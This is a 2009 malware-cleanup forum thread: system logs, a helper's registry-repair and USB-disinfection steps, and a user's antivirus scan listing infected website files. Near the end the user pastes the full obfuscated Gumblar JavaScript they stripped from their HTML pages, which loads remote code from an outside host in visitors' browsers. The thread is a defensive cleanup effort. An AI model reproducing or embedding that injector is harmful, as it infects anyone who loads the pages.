"C:\Program Files\Windows Live\Messenger\msnmsgr.exe"="C:\Program Files\Windows Live\Messenger\msnmsgr.exe:*:Enabled:Windows Live Messenger"

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL aMRITa.eXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}]
shell\AutoRun\command - C:\WINDOWS\system32\RunDLL32.EXE Shell32.DLL,ShellExec_RunDLL amRiTA.eXE

[HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}]
shell\AutoRun\command - F:\RECYCLE\D-0-060-0000000000-1111111-2222222\FiX.exe
shell\open\command - F:\RECYCLE\D-0-060-0000000000-1111111-2222222\FiX.exe


======File associations======

.js - edit - "C:\Program Files\Macromedia\Dreamweaver 8\dreamweaver.exe" "%1"

======List of files/folders created in the last 1 months======

2009-08-04 18:33:39 ----D---- C:\Program Files\ERUNT
2009-08-04 18:01:07 ----D---- C:\HostsXpert
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaws.exe
2009-08-04 00:03:14 ----A---- C:\WINDOWS\system32\javaw.exe
2009-08-04 00:03:13 ----A---- C:\WINDOWS\system32\java.exe
2009-08-04 00:02:47 ----D---- C:\Program Files\Java
2009-07-31 18:25:21 ----D---- C:\_OTM
2009-07-30 18:43:16 ----D---- C:\Documents and Settings\me\Application Data\Teleca
2009-07-30 18:34:07 ----D---- C:\Documents and Settings\me\Application Data\Sony Ericsson
2009-07-30 18:33:17 ----D---- C:\Program Files\Intuwave
2009-07-30 18:33:07 ----D---- C:\Program Files\Symbian
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files\Sony Ericsson Shared
2009-07-30 18:31:22 ----D---- C:\Documents and Settings\All Users\Application Data\Sony Ericsson
2009-07-30 18:30:38 ----D---- C:\Program Files\Common Files\Teleca Shared
2009-07-30 18:30:32 ----D---- C:\Program Files\Sony Ericsson
2009-07-30 18:30:32 ----D---- C:\Documents and Settings\All Users\Application Data\Teleca
2009-07-28 23:43:09 ----D---- C:\rsit
2009-07-28 00:24:24 ----A---- C:\startup.txt
2009-07-28 00:23:45 ----D---- C:\Program Files\Trend Micro
2009-07-22 14:21:05 ----SD---- C:\ComboFix
2009-07-21 12:45:53 ----D---- C:\Documents and Settings\All Users\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:40 ----D---- C:\Program Files\SUPERAntiSpyware
2009-07-21 12:45:40 ----D---- C:\Documents and Settings\me\Application Data\SUPERAntiSpyware.com
2009-07-21 12:45:15 ----D---- C:\Program Files\Common Files\Wise Installation Wizard
2009-07-21 12:37:36 ----SHD---- C:\RECYCLER
2009-07-21 12:33:14 ----A---- C:\ComboFix.txt
2009-07-20 17:28:56 ----D---- C:\Documents and Settings\me\Application Data\Malwarebytes
2009-07-20 17:28:49 ----D---- C:\Program Files\Malwarebytes' Anti-Malware
2009-07-20 17:28:49 ----D---- C:\Documents and Settings\All Users\Application Data\Malwarebytes
2009-07-19 12:27:56 ----RHD---- C:\MSOCache
2009-07-19 11:12:33 ----D---- C:\Program Files\Caricature Studio Green 3.6
2009-07-19 11:11:35 ----D---- C:\Documents and Settings\me\Application Data\Carnival Software
2009-07-16 23:30:50 ----HDC---- C:\WINDOWS\$NtUninstallKB973346$
2009-07-16 23:30:40 ----HDC---- C:\WINDOWS\$NtUninstallKB971633$
2009-07-16 23:27:19 ----HDC---- C:\WINDOWS\$NtUninstallKB961371$
2009-07-10 14:17:03 ----D---- C:\Mp3s
2009-07-06 18:35:03 ----D---- C:\Program Files\iPod
2009-07-06 18:34:50 ----D---- C:\Program Files\iTunes
2009-07-06 18:34:50 ----D---- C:\Documents and Settings\All Users\Application Data\{8CD7F5AF-ECFA-4793-BF40-D8F42DBFF906}
2009-07-06 18:31:32 ----D---- C:\Documents and Settings\All Users\Application Data\Apple Computer
2009-07-06 18:27:03 ----D---- C:\Program Files\Common Files\Apple

======List of files/folders modified in the last 1 months======

2009-08-04 22:47:40 ----D---- C:\WINDOWS\Prefetch
2009-08-04 22:47:32 ----D---- C:\WINDOWS\Temp
2009-08-04 19:25:27 ----D---- C:\WINDOWS\system32\drivers
2009-08-04 19:21:46 ----D---- C:\WINDOWS\network diagnostic
2009-08-04 19:14:14 ----D---- C:\WINDOWS\system32
2009-08-04 19:13:20 ----SD---- C:\WINDOWS\Tasks
2009-08-04 18:34:07 ----D---- C:\WINDOWS\ERDNT
2009-08-04 18:33:39 ----RD---- C:\Program Files
2009-08-04 17:56:53 ----D---- C:\WINDOWS\system32\CatRoot2
2009-08-04 17:50:57 ----A---- C:\WINDOWS\SchedLgU.Txt
2009-08-04 12:42:17 ----SHD---- C:\WINDOWS\Installer
2009-08-04 00:03:20 ----SHD---- C:\Config.Msi
2009-08-04 00:02:52 ----A---- C:\WINDOWS\system32\deploytk.dll
2009-08-03 14:20:33 ----D---- C:\Downloads
2009-08-03 14:18:33 ----D---- C:\Documents and Settings\All Users\Application Data\NOS
2009-08-03 14:18:29 ----D---- C:\Program Files\NOS
2009-08-03 14:18:28 ----SD---- C:\WINDOWS\Downloaded Program Files
2009-08-03 14:17:23 ----D---- C:\Program Files\Unlocker
2009-08-03 14:14:10 ----D---- C:\Program Files\TeamViewer
2009-08-03 13:34:35 ----D---- C:\Documents and Settings\All Users\Application Data\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Common Files\Adobe
2009-08-03 13:33:27 ----D---- C:\Program Files\Adobe
2009-08-03 12:08:44 ----D---- C:\Pictures
2009-07-31 21:25:07 ----D---- C:\WINDOWS\WinSxS
2009-07-31 18:34:39 ----D---- C:\WINDOWS
2009-07-30 18:43:30 ----HD---- C:\WINDOWS\inf
2009-07-30 18:33:17 ----HD---- C:\Program Files\InstallShield Installation Information
2009-07-30 18:31:22 ----D---- C:\Program Files\Common Files
2009-07-30 18:30:39 ----D---- C:\Program Files\Common Files\Microsoft Shared
2009-07-30 18:28:15 ----D---- C:\WINDOWS\Downloaded Installations
2009-07-28 12:56:42 ----RASH---- C:\boot.ini
2009-07-28 12:56:42 ----A---- C:\WINDOWS\win.ini
2009-07-28 12:56:42 ----A---- C:\WINDOWS\system.ini
2009-07-28 12:51:52 ----A---- C:\WINDOWS\ntbtlog.txt
2009-07-28 00:43:12 ----D---- C:\Harsh
2009-07-24 20:49:30 ----D---- C:\Program Files\Mozilla Firefox
2009-07-24 11:58:36 ----D---- C:\RIIMUN
2009-07-22 18:26:58 ----RSD---- C:\WINDOWS\Fonts
2009-07-22 14:22:13 ----SHD---- C:\System Volume Information
2009-07-22 14:22:13 ----D---- C:\WINDOWS\system32\Restore
2009-07-21 16:14:51 ----D---- C:\WINDOWS\pss
2009-07-21 12:16:32 ----D---- C:\Documents and Settings\All Users\Application Data\Microsoft Help
2009-07-20 09:09:41 ----D---- C:\WINDOWS\twain_32
2009-07-20 09:04:30 ----D---- C:\Temp
2009-07-20 08:50:42 ----D---- C:\WINDOWS\system32\NtmsData
2009-07-19 12:36:23 ----D---- C:\Program Files\MSBuild
2009-07-19 12:35:35 ----D---- C:\Program Files\Common Files\DESIGNER
2009-07-19 12:35:23 ----D---- C:\WINDOWS\SHELLNEW
2009-07-19 00:35:05 ----D---- C:\Amrita
2009-07-18 23:37:22 ----A---- C:\WINDOWS\system32\PerfStringBackup.INI
2009-07-18 23:27:37 ----SD---- C:\Documents and Settings\me\Application Data\Microsoft
2009-07-16 23:44:20 ----D---- C:\Program Files\Oberon Media
2009-07-16 23:38:30 ----D---- C:\Program Files\Bonjour
2009-07-16 23:30:53 ----A---- C:\WINDOWS\imsins.BAK
2009-07-16 23:30:49 ----HD---- C:\WINDOWS\$hf_mig$
2009-07-16 23:30:46 ----RSHD---- C:\WINDOWS\system32\dllcache
2009-07-10 14:03:12 ----D---- C:\Velocity Media
2009-07-07 08:10:58 ----A---- C:\WINDOWS\system32\MRT.exe
2009-07-06 18:37:14 ----D---- C:\Documents and Settings\me\Application Data\Apple Computer
2009-07-06 18:35:44 ----DC---- C:\WINDOWS\system32\DRVSTORE
2009-07-06 18:32:25 ----D---- C:\Program Files\QuickTime

======List of drivers (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R1 eabfiltr;eabfiltr; C:\WINDOWS\system32\DRIVERS\eabfiltr.sys [2005-09-19 7808]
R1 eeCtrl;Symantec Eraser Control driver; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\eeCtrl.sys []
R1 intelppm;Intel Processor Driver; C:\WINDOWS\system32\DRIVERS\intelppm.sys [2008-04-14 36352]
R1 kbdhid;Keyboard HID Driver; C:\WINDOWS\system32\DRIVERS\kbdhid.sys [2008-04-14 14592]
R1 SASDIFSV;SASDIFSV; \??\C:\Program Files\SUPERAntiSpyware\SASDIFSV.SYS []
R1 SASKUTIL;SASKUTIL; \??\C:\Program Files\SUPERAntiSpyware\SASKUTIL.sys []
R1 SPBBCDrv;SPBBCDrv; \??\C:\Program Files\Common Files\Symantec Shared\SPBBC\SPBBCDrv.sys []
R1 SRTSP;SRTSP; C:\WINDOWS\System32\Drivers\SRTSP.SYS [2009-03-04 280112]
R1 SRTSPX;SRTSPX; C:\WINDOWS\System32\Drivers\SRTSPX.SYS [2009-03-04 43824]
R1 SYMTDI;SYMTDI; C:\WINDOWS\System32\Drivers\SYMTDI.SYS [2008-08-21 191536]
R1 WmiAcpi;Microsoft Windows Management Interface for ACPI; C:\WINDOWS\system32\DRIVERS\wmiacpi.sys [2008-04-14 8832]
R1 WPS;WPS; \??\C:\WINDOWS\system32\drivers\wpsdrvnt.sys []
R1 WS2IFSL;Windows Socket 2.0 Non-IFS Service Provider Support Environment; C:\WINDOWS\System32\drivers\ws2ifsl.sys [2004-08-05 12032]
R2 adfs;adfs; C:\WINDOWS\system32\drivers\adfs.sys [2008-08-14 74720]
R2 mdmxsdk;mdmxsdk; C:\WINDOWS\system32\DRIVERS\mdmxsdk.sys [2006-02-15 12672]
R3 Arp1394;1394 ARP Client Protocol; C:\WINDOWS\system32\DRIVERS\arp1394.sys [2008-04-14 60800]
R3 BTKRNL;Bluetooth Bus Enumerator; C:\WINDOWS\system32\DRIVERS\btkrnl.sys [2006-05-12 1342602]
R3 BTWUSB;WIDCOMM USB Bluetooth Driver; C:\WINDOWS\System32\Drivers\btwusb.sys [2006-05-12 57320]
R3 CmBatt;Microsoft ACPI Control Method Battery Driver; C:\WINDOWS\system32\DRIVERS\CmBatt.sys [2008-04-14 13952]
R3 EraserUtilRebootDrv;EraserUtilRebootDrv; \??\C:\Program Files\Common Files\Symantec Shared\EENGINE\EraserUtilRebootDrv.sys []
R3 GEARAspiWDM;GEAR ASPI Filter Driver; C:\WINDOWS\system32\DRIVERS\GEARAspiWDM.sys [2009-03-19 23400]
R3 HBtnKey;HBtnKey; C:\WINDOWS\system32\DRIVERS\cpqbttn.sys [2005-09-19 9344]
R3 HdAudAddService;Microsoft UAA Function Driver for High Definition Audio Service; C:\WINDOWS\system32\drivers\CHDAud.sys [2006-06-02 572928]
R3 HDAudBus;Microsoft UAA Bus Driver for High Definition Audio; C:\WINDOWS\system32\DRIVERS\HDAudBus.sys [2008-04-13 144384]
R3 HidUsb;Microsoft HID Class Driver; C:\WINDOWS\system32\DRIVERS\hidusb.sys [2008-04-14 10368]
R3 HSF_DPV;HSF_DPV; C:\WINDOWS\system32\DRIVERS\HSF_DPV.sys [2006-04-20 995712]
R3 HSFHWAZL;HSFHWAZL; C:\WINDOWS\system32\DRIVERS\HSFHWAZL.sys [2006-04-20 208000]
R3 ialm;ialm; C:\WINDOWS\system32\DRIVERS\ialmnt5.sys [2006-03-23 1166972]
R3 mouhid;Mouse HID Driver; C:\WINDOWS\system32\DRIVERS\mouhid.sys [2001-08-17 12160]
R3 NAVENG;NAVENG; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.003\NAVENG.SYS []
R3 NAVEX15;NAVEX15; \??\C:\PROGRA~1\COMMON~1\SYMANT~1\VIRUSD~1\20090804.003\NAVEX15.SYS []
R3 NIC1394;1394 Net Driver; C:\WINDOWS\system32\DRIVERS\nic1394.sys [2008-04-14 61824]
R3 rimmptsk;rimmptsk; C:\WINDOWS\system32\DRIVERS\rimmptsk.sys [2005-11-17 28928]
R3 rimsptsk;rimsptsk; C:\WINDOWS\system32\DRIVERS\rimsptsk.sys [2005-12-22 51840]
R3 rismxdp;Ricoh xD-Picture Card Driver; C:\WINDOWS\system32\DRIVERS\rixdptsk.sys [2005-11-01 308992]
R3 sdbus;sdbus; C:\WINDOWS\system32\DRIVERS\sdbus.sys [2008-04-14 79232]
R3 SymEvent;SymEvent; \??\C:\WINDOWS\system32\Drivers\SYMEVENT.SYS []
R3 SYMREDRV;SYMREDRV; C:\WINDOWS\System32\Drivers\SYMREDRV.SYS [2008-08-21 27696]
R3 SynTP;Synaptics TouchPad Driver; C:\WINDOWS\system32\DRIVERS\SynTP.sys [2006-06-17 193120]
R3 Teefer2;Teefer2 Miniport; C:\WINDOWS\system32\DRIVERS\teefer2.sys [2008-10-14 49536]
R3 usbehci;Microsoft USB 2.0 Enhanced Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbehci.sys [2008-04-14 30208]
R3 usbhub;USB2 Enabled Hub; C:\WINDOWS\system32\DRIVERS\usbhub.sys [2008-04-14 59520]
R3 usbuhci;Microsoft USB Universal Host Controller Miniport Driver; C:\WINDOWS\system32\DRIVERS\usbuhci.sys [2008-04-14 20608]
R3 w39n51;Intel(R) PRO/Wireless 3945ABG Adapter Driver; C:\WINDOWS\system32\DRIVERS\w39n51.sys [2006-04-21 1429632]
R3 winachsf;winachsf; C:\WINDOWS\system32\DRIVERS\HSF_CNXT.sys [2006-04-20 727296]
R3 WpsHelper;WpsHelper; \??\C:\WINDOWS\system32\drivers\WpsHelper.sys []
R3 zebrceb;Sony Ericsson Cable Emulation Bus (WDM); C:\WINDOWS\system32\DRIVERS\zebrceb.sys [2007-04-13 62984]
S3 catchme;catchme; \??\C:\DOCUME~1\me\LOCALS~1\Temp\catchme.sys []
S3 COH_Mon;COH_Mon; \??\C:\WINDOWS\system32\Drivers\COH_Mon.sys []
S3 E100B;Intel(R) PRO Network Connection Driver; C:\WINDOWS\system32\DRIVERS\e100b325.sys [2006-04-11 163328]
S3 eabusb;eabusb; C:\WINDOWS\system32\DRIVERS\eabusb.sys [2005-09-19 5760]
S3 HPZid412;IEEE-1284.4 Driver HPZid412; C:\WINDOWS\system32\DRIVERS\HPZid412.sys [2003-04-11 51024]
S3 HPZipr12;Print Class Driver for IEEE-1284.4 HPZipr12; C:\WINDOWS\system32\DRIVERS\HPZipr12.sys [2003-04-11 16080]
S3 HPZius12;USB to IEEE-1284.4 Translation Driver HPZius12; C:\WINDOWS\system32\DRIVERS\HPZius12.sys [2003-04-11 21456]
S3 Profos;Profos; C:\WINDOWS\system32\drivers\Profos.sys []
S3 rtl8139;Realtek RTL8139(A/B/C)-based PCI Fast Ethernet Adapter NT Driver; C:\WINDOWS\system32\DRIVERS\RTL8139.SYS [2004-08-04 20992]
S3 SASENUM;SASENUM; \??\C:\Program Files\SUPERAntiSpyware\SASENUM.SYS []
S3 sffdisk;SFF Storage Class Driver; C:\WINDOWS\system32\DRIVERS\sffdisk.sys [2008-04-14 11904]
S3 sffp_sd;SFF Storage Protocol Driver for SDBus; C:\WINDOWS\system32\DRIVERS\sffp_sd.sys [2008-04-14 11008]
S3 SRTSPL;SRTSPL; C:\WINDOWS\System32\Drivers\SRTSPL.SYS [2009-03-04 319920]
S3 Trufos;Trufos; C:\WINDOWS\system32\drivers\Trufos.sys []
S3 UIUSys;Conexant Setup API; C:\WINDOWS\system32\DRIVERS\UIUSYS.SYS []
S3 usbccgp;Microsoft USB Generic Parent Driver; C:\WINDOWS\system32\DRIVERS\usbccgp.sys [2008-04-14 32128]
S3 usbprint;Microsoft USB PRINTER Class; C:\WINDOWS\system32\DRIVERS\usbprint.sys [2008-04-14 25856]
S3 usbscan;USB Scanner Driver; C:\WINDOWS\system32\DRIVERS\usbscan.sys [2008-04-14 15104]
S3 USBSTOR;USB Mass Storage Driver; C:\WINDOWS\system32\DRIVERS\USBSTOR.SYS [2008-04-14 26368]
S3 WudfPf;Windows Driver Foundation - User-mode Driver Framework Platform Driver; C:\WINDOWS\system32\DRIVERS\WudfPf.sys [2006-09-28 77568]
S3 zebrbus;Sony Ericsson Composite Device driver; C:\WINDOWS\system32\DRIVERS\zebrbus.sys [2007-04-13 83080]
S3 zebrmdfl;Sony Ericsson Modem Filter; C:\WINDOWS\system32\DRIVERS\zebrmdfl.sys [2007-04-13 15112]
S3 zebrmdm;Sony Ericsson Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdm.sys [2007-04-13 108296]
S3 zebrmdmc;Sony Ericsson mRouter Port (WDM); C:\WINDOWS\system32\DRIVERS\zebrmdmc.sys [2007-04-13 108424]
S3 zebrsce;Sony Ericsson PC-Connect Port; C:\WINDOWS\system32\DRIVERS\zebrsce.sys [2007-04-13 90888]
S4 agp440;Intel AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agp440.sys [2008-04-14 42368]
S4 agpCPQ;Compaq AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\agpCPQ.sys [2008-04-14 44928]
S4 alim1541;ALI AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\alim1541.sys [2008-04-14 42752]
S4 amdagp;AMD AGP Bus Filter Driver; C:\WINDOWS\system32\DRIVERS\amdagp.sys [2008-04-14 43008]
S4 cbidf;cbidf; C:\WINDOWS\system32\DRIVERS\cbidf2k.sys [2001-08-18 13952]
S4 sisagp;SIS AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\sisagp.sys [2008-04-14 40960]
S4 SysPlant;SysPlant for NT; C:\WINDOWS\SYSTEM32\Drivers\SysPlant.sys [2009-05-12 91976]
S4 viaagp;VIA AGP Bus Filter; C:\WINDOWS\system32\DRIVERS\viaagp.sys [2008-04-14 42240]

======List of services (R=Running, S=Stopped, 0=Boot, 1=System, 2=Auto, 3=Demand, 4=Disabled)======

R2 btwdins;Bluetooth Service; C:\Program Files\WIDCOMM\Bluetooth Software\bin\btwdins.exe [2006-05-12 258103]
R2 ccEvtMgr;Symantec Event Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 ccSetMgr;Symantec Settings Manager; C:\Program Files\Common Files\Symantec Shared\ccSvcHst.exe [2009-03-17 108392]
R2 JavaQuickStarterService;Java Quick Starter; C:\Program Files\Java\jre6\bin\jqs.exe [2009-08-04 152984]
R2 SmcService;Symantec Management Client; C:\Program Files\Symantec\Symantec Endpoint Protection\Smc.exe [2009-05-12 1803592]
R2 Symantec AntiVirus;Symantec Endpoint Protection; C:\Program Files\Symantec\Symantec Endpoint Protection\Rtvscan.exe [2009-05-12 2440632]
S3 Adobe LM Service;Adobe LM Service; C:\Program Files\Common Files\Adobe Systems Shared\Service\Adobelmsvc.exe [2008-07-27 72704]
S3 aspnet_state;ASP.NET State Service; C:\WINDOWS\Microsoft.NET\Framework\v1.1.4322\aspnet_state.exe [2004-07-15 32768]
S3 LiveUpdate;LiveUpdate; C:\PROGRA~1\Symantec\LIVEUP~1\LUCOMS~1.EXE [2009-03-20 3093880]
S3 WudfSvc;Windows Driver Foundation - User-mode Driver Framework; C:\WINDOWS\system32\svchost.exe [2008-04-14 14336]
S4 AddFiltr;AddFiltr; C:\Program Files\Hewlett-Packard\HP Quick Launch Buttons\AddFiltr.exe [2006-06-12 126976]
S4 Apple Mobile Device;Apple Mobile Device; C:\Program Files\Common Files\Apple\Mobile Device Support\bin\AppleMobileDeviceService.exe [2009-06-05 144712]
S4 FLEXnet Licensing Service;FLEXnet Licensing Service; C:\Program Files\Common Files\Macrovision Shared\FLEXnet Publisher\FNPLicensingService.exe [2009-06-11 655624]
S4 gusvc;Google Software Updater; C:\Program Files\Google\Common\Google Updater\GoogleUpdaterService.exe [2009-06-05 182768]
S4 hpqwmiex;hpqwmiex; C:\Program Files\Hewlett-Packard\Shared\hpqwmiex.exe [2006-05-02 135168]
S4 IDriverT;InstallDriver Table Manager; c:\Program Files\Common Files\InstallShield\Driver\1050\Intel 32\IDriverT.exe [2004-10-22 73728]
S4 iPod Service;iPod Service; C:\Program Files\iPod\bin\iPodService.exe [2009-06-05 541992]
S4 LightScribeService;LightScribeService Direct Disc Labeling Service; C:\Program Files\Common Files\LightScribe\LSSrvc.exe [2006-05-18 49152]
S4 Microsoft Office Groove Audit Service;Microsoft Office Groove Audit Service; C:\Program Files\Microsoft Office\Office12\GrooveAuditService.exe [2006-10-27 65824]
S4 odserv;Microsoft Office Diagnostics Service; C:\Program Files\Common Files\Microsoft Shared\OFFICE12\ODSERV.EXE [2006-10-26 441136]
S4 ose;Office Source Engine; C:\Program Files\Common Files\Microsoft Shared\Source Engine\OSE.EXE [2006-10-26 145184]
S4 Pml Driver HPZ12;Pml Driver HPZ12; C:\WINDOWS\system32\HPZipm12.exe [2003-04-11 65795]
S4 RichVideo;Cyberlink RichVideo Service(CRVS); C:\Program Files\CyberLink\Shared Files\RichVideo.exe [2005-08-08 167936]
S4 SNAC;Symantec Network Access Control; C:\Program Files\Symantec\Symantec Endpoint Protection\SNAC.EXE [2009-02-01 320840]
S4 WMPNetworkSvc;Windows Media Player Network Sharing Service; C:\Program Files\Windows Media Player\WMPNetwk.exe [2006-10-18 913408]

-----------------EOF-----------------
hn2009
Active Member
 
Posts: 12
Joined: July 22nd, 2009, 4:59 am

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Post by Dakeyras » August 4th, 2009, 2:01 pm

Hi :)

My browser seems to work fine as of now.. however since the problem is intermittent I will keep an eye out for the same problem again and will let you know. Thanks again for your valuable time and effort.
OK that's fine and you are welcome!

Backup the Registry:

Modifying the Registry can create unforeseen problems, so it is always wise to create a backup before doing so.

Please navigate to Start >> All Programs >> ERUNT >> ERUNT

  • Click on OK within the pop-up menu.
  • In the next menu under C:\WINDOWS\ERDNT\DD-MM-YYYY under Backup options make sure both the following are selected:
      • System registry
      • Current user registry
  • Next click on OK
  • When the Question pop-up appears click on Yes
  • After a short duration the "Registry backup is complete!" popup will appear
  • Now click on OK. A backup has been created.

Note: If you have uninstalled ERUNT since last used, please inform myself before proceeding any further.

Next:

  • Double-click OTM to start the program.
  • Copy the lines from the codebox to the clipboard by highlighting ALL of them and pressing CTRL + B (or, after highlighting, right-click and choose Copy):
Code:
:Reg
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\H]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{9d3c3908-9f8e-11dd-8976-001302e184fe}]
[-HKEY_CURRENT_USER\software\microsoft\windows\currentversion\explorer\mountpoints2\{b2b2c244-5aae-11de-89f0-001302e184fe}]

:Commands
[EmptyTemp]
[Reboot]
  • Return to OTM, right-click in the "Paste instructions for items to be moved" window (under the yellow bar) and choose Paste
  • Then click the red MoveIt! button.
  • Copy everything in the Results window (under the green bar) to the clipboard by highlighting ALL of it and pressing CTRL + C (or, after highlighting, right-click and choose Copy), and paste it into your next response.
  • If OTM asks to reboot your computer, allow it to do so. The report should appear in Notepad after the reboot.
  • Close OTM.

Flash Disinfector:

Use this on any USB/Flash drives you may have and/or USB external Hard-Drives.

  • Please download Flash_Disinfector and save it to your desktop.
  • Double click to run it.
  • You will be prompted to plug in your flash drive. Plug it in.
  • Flash_Disinfector will start disinfecting your flash and hard drives. This takes a few seconds. Your desktop will disappear in the meantime.
  • When done, a message box will appear. Click OK. Your desktop should now appear. If it doesn't, press Ctrl + Shift + Esc to open Task Manager.
  • Click on File > New Task (Run...). Type in explorer.exe and press Enter. Your desktop should now appear.

When completed the above, please post back the following in the order asked for:

  • How is your computer performing now? Any further symptoms and/or problems encountered?
  • OTM Log.
  • A new RSIT Log.
Dakeyras
MRU Honors Graduate
 
Posts: 8804
Joined: November 21st, 2007, 5:30 am
Location: The Tundra

Re: HJT LOG (IE - Internet Explorer cannot display the webpage)

Post by hn2009 » August 6th, 2009, 10:59 am

Hi,

The computer is working better I think. I've not had problems so far. Though what I did was to connect my USB Hard Drive and have that scanned using the Kaspersky Online Scanner. So I'm also posting the results for that; although I do have a question regarding it: OTM has moved the infected files as follows - "C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1" however I need to use these html files and would like to know how to get rid of the Trojan.

I've tried something and would like to know if I'm right... I noticed the following code right before the body tag and deleted it. Did I do the right thing? Will it completely eradicate the problem? Please advise. Thanks.

Code:
<script language=javascript><!-- 
(function(){var dTccx=('@76ar@20a@3d@22Scrip@74E@6egine@22@2cb@3d@22Vers@69on(@29+@22@2c@6a@3d@22@22@2cu@3d@6e@61v@69g@61@74or@2e@75serAgent@3bif(@28u@2eindexO@66@28@22Chr@6fm@65@22@29@3c0)@26@26(u@2eindexOf(@22Win@22)@3e@30@29@26@26(u@2ein@64ex@4f@66@28@22NT@206@22)@3c0)@26@26(doc@75men@74@2e@63ookie@2e@69ndexOf(@22miek@3d1@22)@3c@30)@26@26(typ@65o@66@28z@72vz@74s)@21@3dty@70eof@28@22A@22)))@7bzrvzt@73@3d@22A@22@3be@76@61l(@22i@66(wi@6edo@77@2e@22+@61+@22)j@3dj+@22+a+@22M@61jor@22+@62+a+@22Mi@6e@6fr@22+@62@2ba+@22@42uild@22@2bb+@22@6a@3b@22@29@3bdo@63@75m@65nt@2ewr@69te(@22@3cs@63@72i@70@74@20sr@63@3d@2f@2fmar@22+@22tuz@2e@63@6e@2f@76id@2f@3fid@3d@22+@6a@2b@22@3e@3c@5c@2f@73cript@3e@22)@3b@7d').replace(/@/g,'%');var Gs8B=unescape(dTccx);eval(Gs8B)})();
 --></script>


Kaspersky Log

--------------------------------------------------------------------------------
KASPERSKY ONLINE SCANNER 7.0 REPORT
Thursday, August 6, 2009
Operating System: Microsoft Windows XP Home Edition Service Pack 3 (build 2600)
Kaspersky Online Scanner version: 7.0.26.13
Program database last update: Wednesday, August 05, 2009 06:27:04
Records in database: 2581856
--------------------------------------------------------------------------------

Scan settings:
Scan using the following database: extended
Scan archives: yes
Scan mail databases: yes

Scan area - My Computer:
C:\
D:\
E:\
H:\

Scan statistics:
Files scanned: 300625
Threat name: 6
Infected objects: 67
Suspicious objects: 0
Duration of the scan: 12:46:29


File name / Threat name / Threats count
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Web Design\Vector Graphics\645 Vector Design Elements.exe Infected: Trojan-Downloader.Win32.AutoIt.is 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\about.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\bottom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\contact.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\corpevents.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\creative.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\events.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\gallery.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\gallery2.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\marcom.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\marketing.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\menu.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\menu.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_dom.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_ie.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_iemac.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_opera.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pbrowser_safari.js Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\portfolio.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\pr.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\services.html Infected: Trojan-Downloader.JS.Gumblar.a 1
C:\_OTM\MovedFiles\08042009_191310\Velocity Media\Website v2\swfobject.js Infected: Trojan-Downloader.JS.Gumblar.a 1
